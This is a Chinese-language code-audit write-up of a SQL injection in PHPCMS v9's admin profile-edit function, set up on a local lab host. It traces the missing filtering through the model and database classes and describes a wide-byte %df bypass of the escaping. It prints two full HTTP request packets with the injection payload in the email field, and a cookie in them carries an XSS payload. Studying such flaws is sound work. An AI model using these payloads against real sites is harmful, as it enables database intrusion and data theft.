cms sql注入代码审计
审计工具
seasy源代码审计系统
Phpstudy 8.1.1.2

审计步骤
在cms中默认对输入的数据进行转义

通过对代码审计发现一处在对用户信息更新时未对字符进行严格过滤导致的sql注入
在更新用户信息处直接获取输入的info数据带入数据库查询

在这里接着向上搜索看到调用的是admin_model这个模型，继续查找该模型

找到admin_model模型，其实例化一个类model。向上查找model类

在model中定义了数据库的基本操作，找到我们需要的update方法，同样这一又调用了一个类。

在这里可以看到调用的是db_factory类对数据库进行操作，继续跟踪该类。

在db_factory类中定义了数据库的相关信息以及加载了一个类mysql来对数据库的查询语句进行查询。

找到mysql_class类中，找到我们需要的update方法。在该方法中调用escape_string对输入的数据进行过滤。向上搜索escape_string方法。

找到escape方法，发现对输入的数据没有做过滤操作。

将返回的数据库查询语句带入execute进行查询。

在这里可以看到存在注入，由于cms对输入自动默认转义，所以需要对转义进

注入实现
行绕过即是用宽字节的方法吃掉转义符号\，即是使用%df进行绕过。
接下来本地搭建环境使用管理员进行登录

提交修改数据，由于在邮箱处的数据在前端存在格式要求，于是进行抓包修改email的数据，在email的数据后面添加%df’ 使得查询语句成功报错。
由于是后台注入，即是需要提供管理员的登录cookie

于是去掉’将数据包写入POST.txt使用sqlmap进行工具自动化注入。

成功注入，获取到了当前的数据库名称phpcmsv9

报错回显数据包
POST /index.php?m=admin&c=admin_manage&a=public_edit_info HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4464.5 Safari/537.36
Accept: text/html,application/xhtml+x ml,application/x ml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://127.0.0.1:8093
Connection: close
Referer: http://127.0.0.1:8093/index.php?m=admin&c=admin_manage&a=public_edit_info&menuid=972&pc_hash=G9EuRQ
Cookie: PHPSESSID=v0k1udcnitupj9d52qcjjiab74; yzmphp_adminid=07ce0qT4pwrMxE0QioXhznmSqzn9xvX-wS6roZVM; yzmphp_adminname=96f3fyXUcF4vbSOyFlmsmJJ8ZLOiYTC2PyrWgUSuLvZM7L0; yzmphpuserid=95d1JBGLHsq7c_H5MnQCOKOq0aF9Qsx6J2fom0Zu; yzmphp__username=723bYEGbfwpBAAUrcunS5jJfVjXmidic2APVLMMijCPC_w; yzmphpgroupid=0bfe4XTEl4nS-XVAQr92HsD_5dTTBuftMjucTvPF; yzmphp**nickname=ef75MiizaYw-1pOtVKekYUGWSdQVtlCPPu9gvomBbsxMnQ; TffoQ_siteid=333erUtfR7Fe5Jw28wZJETYBElboNmp1ET0UFRpd; TffoQ_admin_email=2d34ilHVoG_P9QUdQNq8FvZ4pqgJDuaull1SYafs0eTQC1quNmRA; TffoQ_sys_lang=98dcWC54M_XkuMYkIEFf5NWMjbi-_1gMJ21AHPTIh6rI3Q; TffoQ_module=d88146WmoR4F0Tv_hzGkNaAxC-GlinO1sIu8pJ2Us0mpGDhk; TffoQ_catid=cb92ksUsFPQ8RwENCVgtODGrZdbqAtEKD7mAZctF; treeview-black=0; sYQDUGqqzHsearch_history=%26quot%26gt%3B%26lt%3BIMG%20SRC%3DA%20o nerror%3Da lert%28/xs/%29%26gt%3B%26lt%3B%26quot%7C1%2C1%7C1%2C%26quot%7C1; TffoQ_admin_username=ae3czGm1cWj9M9syw3EdExmONEZuP8cifNhQx22kLeVezks; TffoQ_userid=bb58JlspltYeM05GfmUeeBAOOobm3ebDNML-ut-6; oGHAM_siteid=a4d1a9zqsKRzNCgWRMu9wUSyrPkbjpRAuCJZ-**h; oGHAM_admin_email=9ac3BGQkprHXpx0ieYuguoeT7Hy3EjrfXbm8R8hup6Ecx073IRU; oGHAM_sys_lang=f1b12Ej8rfCmO-sJbOaCStoR0WjaNd91m0QjjuFZ7yIOMQ; VLmUN_admin_username=75284kMEhTsq7wjBD-l1l2kyiL75vi8ni6tCfdbuBOCZU48; VLmUN_siteid=acc4rXwB3hHEcw-coAM-xYe2824cipgGyA6fE-dL; VLmUN_userid=b5b3mf4bydL77FC34TTKRHFXcCZQi5r_8xkohJ5l; VLmUN_admin_email=a60agMFhN7xqheohRH5nKCaqQ6bFId0jOwqb-hmQF-mbAg7gE5Y; VLmUN_sys_lang=8fa0qIbrI3bl3lgF6HJ4jVZsuDWJMW6Eok82-Incda4TrA; VOrQw_admin_username=5f934p_CrF2_PkwMpMfCodD3dvfbWPS7WwU4LYGEFStV-xc; VOrQw_siteid=67ec_Tu3aq37MeFwk3Kgan1FkgJnTKtShq34epex; VOrQw_userid=a4fb7ZyRo25av3MLW4OEfvGlflYmTcipsJC4uunm; VOrQw_admin_email=a979_GifxnWPS-KIS_i0jqtSfmRv0TDSg79rQm7-GDHAh01pUt0; VOrQw_sys_lang=80dfQ-tsnMhqOcFTS_kEPoP5uZU8iuO9p_3C5gcmKEY30Q
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

info%5Buserid%5D=1&info%5Busername%5D=phpcms&info%5Brealname%5D=123&info%5Bemail%5D=12%4012.com%df'&info%5Blang%5D=zh-cn&dosubmit=%CC%E1%BD%BB&pc_hash=G9EuRQ

注入数据包

POST /index.php?m=admin&c=admin_manage&a=public_edit_info HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4464.5 Safari/537.36
Accept: text/html,application/xhtml+x ml,application/x ml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://127.0.0.1:8093
Connection: close
Referer: http://127.0.0.1:8093/index.php?m=admin&c=admin_manage&a=public_edit_info&menuid=972&pc_hash=G9EuRQ
Cookie: PHPSESSID=v0k1udcnitupj9d52qcjjiab74; yzmphp_adminid=07ce0qT4pwrMxE0QioXhznmSqzn9xvX-wS6roZVM; yzmphp_adminname=96f3fyXUcF4vbSOyFlmsmJJ8ZLOiYTC2PyrWgUSuLvZM7L0; yzmphpuserid=95d1JBGLHsq7c_H5MnQCOKOq0aF9Qsx6J2fom0Zu; yzmphp__username=723bYEGbfwpBAAUrcunS5jJfVjXmidic2APVLMMijCPC_w; yzmphpgroupid=0bfe4XTEl4nS-XVAQr92HsD_5dTTBuftMjucTvPF; yzmphp**nickname=ef75MiizaYw-1pOtVKekYUGWSdQVtlCPPu9gvomBbsxMnQ; TffoQ_siteid=333erUtfR7Fe5Jw28wZJETYBElboNmp1ET0UFRpd; TffoQ_admin_email=2d34ilHVoG_P9QUdQNq8FvZ4pqgJDuaull1SYafs0eTQC1quNmRA; TffoQ_sys_lang=98dcWC54M_XkuMYkIEFf5NWMjbi-_1gMJ21AHPTIh6rI3Q; TffoQ_module=d88146WmoR4F0Tv_hzGkNaAxC-GlinO1sIu8pJ2Us0mpGDhk; TffoQ_catid=cb92ksUsFPQ8RwENCVgtODGrZdbqAtEKD7mAZctF; treeview-black=0; sYQDUGqqzHsearch_history=%26quot%26gt%3B%26lt%3BIMG%20SRC%3DA%20o nerror%3Da lert%28/xs/%29%26gt%3B%26lt%3B%26quot%7C1%2C1%7C1%2C%26quot%7C1; TffoQ_admin_username=ae3czGm1cWj9M9syw3EdExmONEZuP8cifNhQx22kLeVezks; TffoQ_userid=bb58JlspltYeM05GfmUeeBAOOobm3ebDNML-ut-6; oGHAM_siteid=a4d1a9zqsKRzNCgWRMu9wUSyrPkbjpRAuCJZ-**h; oGHAM_admin_email=9ac3BGQkprHXpx0ieYuguoeT7Hy3EjrfXbm8R8hup6Ecx073IRU; oGHAM_sys_lang=f1b12Ej8rfCmO-sJbOaCStoR0WjaNd91m0QjjuFZ7yIOMQ; VLmUN_admin_username=75284kMEhTsq7wjBD-l1l2kyiL75vi8ni6tCfdbuBOCZU48; VLmUN_siteid=acc4rXwB3hHEcw-coAM-xYe2824cipgGyA6fE-dL; VLmUN_userid=b5b3mf4bydL77FC34TTKRHFXcCZQi5r_8xkohJ5l; VLmUN_admin_email=a60agMFhN7xqheohRH5nKCaqQ6bFId0jOwqb-hmQF-mbAg7gE5Y; VLmUN_sys_lang=8fa0qIbrI3bl3lgF6HJ4jVZsuDWJMW6Eok82-Incda4TrA; VOrQw_admin_username=5f934p_CrF2_PkwMpMfCodD3dvfbWPS7WwU4LYGEFStV-xc; VOrQw_siteid=67ec_Tu3aq37MeFwk3Kgan1FkgJnTKtShq34epex; VOrQw_userid=a4fb7ZyRo25av3MLW4OEfvGlflYmTcipsJC4uunm; VOrQw_admin_email=a979_GifxnWPS-KIS_i0jqtSfmRv0TDSg79rQm7-GDHAh01pUt0; VOrQw_sys_lang=80dfQ-tsnMhqOcFTS_kEPoP5uZU8iuO9p_3C5gcmKEY30Q
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

info%5Buserid%5D=1&info%5Busername%5D=phpcms&info%5Brealname%5D=123&info%5Bemail%5D=12%4012.com%df&info%5Blang%5D=zh-cn&dosubmit=%CC%E1%BD%BB&pc_hash=G9EuRQ